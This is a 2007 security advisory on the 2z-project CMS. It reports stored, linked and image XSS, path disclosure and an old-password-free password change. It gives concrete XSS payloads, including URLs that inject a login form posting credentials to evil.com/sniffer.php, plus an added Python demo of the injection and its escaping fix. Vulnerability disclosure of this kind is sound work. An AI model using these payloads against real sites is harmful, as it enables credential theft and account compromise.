Network Security Bugtraq

2z-project 0.9.6.1 Multiple Security Vulnerabilities

Subject: 2z-project 0.9.6.1 Multiple Security Vulnerabilities
Date: Fri, 28 Dec 2007 16:26:11 +0300

Digital Security Research Group [DSecRG] Advisory

Name:                    2z project
Systems Affected:        2z project 0.9.6.1
Vendor URL:              http://2z-project.ru
Authors:                 Alexandr Polyakov, Stas Svistunovich
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
Reported:                27.12.2007
Vendor response:         27.12.2007
Date of Public Advisory: 28.12.2007

Description
***********

2z system has multiple security vulnerabilities:

1.  Stored XSS
2.  Linked XSS
3.  Image XSS
4.  Path disclosure
5.  Vulnerable Password changing algorithm


Details
*******


1. Multiple Stored XSS


1.1 Vulnerability in script http://[server]/[installdir]/?action=addnews in POST parameters:

parameter name = contentshort
parameter name = contentfull

Example:

contentshort=<script>alert('DSecRG XSS')</script>
contentfull=<script>alert('DSecRG XSS')</script>


1.2 Vulnerability in script http://[server]/[installdir]/2z/admin.php?mod=pm&action=write

parameter name = content

Example:

content=<script>alert('DSecRG XSS')</script>

---------------------------------------------------

2. Linked XSS Vulnerability in page index.php.
Works only if the user is not logged in, so it can be used for phishing (see Example).

Template /templates/default/usermenu.tpl has a vulnerable parameter "referer".
This template is included in index.php, so it can be used for phishing.

Source code of usermenu.tpl:
---------------------------------------
<form name="login" method="post" action="" id="login">
<input type="hidden" name="referer" value="{request_uri}" />   <-- HTML code injected into {request_uri}
<input type="hidden" name="action" value="dologin" />
..
<input onfocus="if (!set_login){set_login=1;this.value='';}" value="{l_name}" 
class="mw_login_form" type="text" name="username" maxlength="60" size="25" />
..
<input onfocus="if(!set_pass){set_pass=1;this.value='';}" value="{l_password}" 
class="mw_login_form" type="password" name="password" maxlength="20" size="25" 
/>
..
</form>
---------------------------------------

Example:

http://[server]/[installdir]/?"/><form/name="login"/method="post"/action="http://evil.com/sniffer.php"/id="login";><input/type="hidden"/name="referer"/value="
http://[server]/[installdir]/index.php?"/><form/name="login"/method="post"/action="http://evil.com/sniffer.php"/id="login";><input/type="hidden"/name="referer"/value="
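As an added illustration (not part of the advisory and not 2z-project code), the Python below models the {request_uri} substitution in usermenu.tpl next to the attribute-escaping fix; the template fragment, the probe URI and the evil.example host are constructed here, and the form-action extractor is a plain regex rather than a full HTML parser.

```python
import html
import re

# Constructed fragment mirroring the structure of usermenu.tpl quoted above:
# the hidden referer input precedes the credential fields inside the form.
TEMPLATE = (
    '<form name="login" method="post" action="" id="login">\n'
    '<input type="hidden" name="referer" value="{request_uri}" />\n'
    '<input type="hidden" name="action" value="dologin" />\n'
    '<input type="text" name="username" />\n'
    '<input type="password" name="password" />\n'
    '</form>'
)


def render_vulnerable(request_uri: str) -> str:
    """Raw substitution: the request URI lands unescaped in an attribute value."""
    return TEMPLATE.replace("{request_uri}", request_uri)


def render_fixed(request_uri: str) -> str:
    """Escape for an HTML attribute context (quotes, <, >, &) before substitution."""
    return TEMPLATE.replace("{request_uri}", html.escape(request_uri, quote=True))


# Action target of every opening <form ...> tag in a rendered fragment.
FORM_ACTION = re.compile(r'<form\b[^>]*\baction="([^"]*)"', re.IGNORECASE)


def form_actions(markup: str) -> list:
    """List the action attribute of each <form> element, in document order."""
    return FORM_ACTION.findall(markup)


# Constructed probe: a quote closes the value attribute, '/>' closes the input,
# and a new <form> aimed at another host then wraps the username/password fields.
PROBE_URI = (
    '/index.php?"/><form name="login" method="post" '
    'action="http://evil.example/collect">'
    '<input type="hidden" name="referer" value="'
)

if __name__ == "__main__":
    print("vulnerable:", form_actions(render_vulnerable(PROBE_URI)))  # ['', 'http://evil.example/collect']
    print("fixed:     ", form_actions(render_fixed(PROBE_URI)))       # ['']
```

With the fix applied, the probe survives only as text inside the hidden field's value, so the credential fields still submit to the site's own form.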

-------------------------------------------------

3. Image XSS Vulnerability in page /2z/?action=profile

An attacker can upload an avatar and a photo containing XSS code.

Vulnerable parameters: newavatar, newphoto

For more information see http://www.dsec.ru/about/articles/web_xss/ (in Russian)

-------------------------------------------------

4.  Path disclosure

By exploiting this issue, an attacker may gain sensitive information on the directory structure of the server machine, which allows for further attacks against the site.

Example:

http://[server]/[installdir]/index.php?template=test
http://[server]/[installdir]/?year=1234&month=06 

-------------------------------------------------

5. Password changing vulnerability

The old password is not required to change the password.

-------------------------------------------------


About
*****

Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards.
Digital Security Research Group focuses on web application and database security problems, with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact:        research [at] dsec [dot] ru
                http://www.dsec.ru (in Russian)
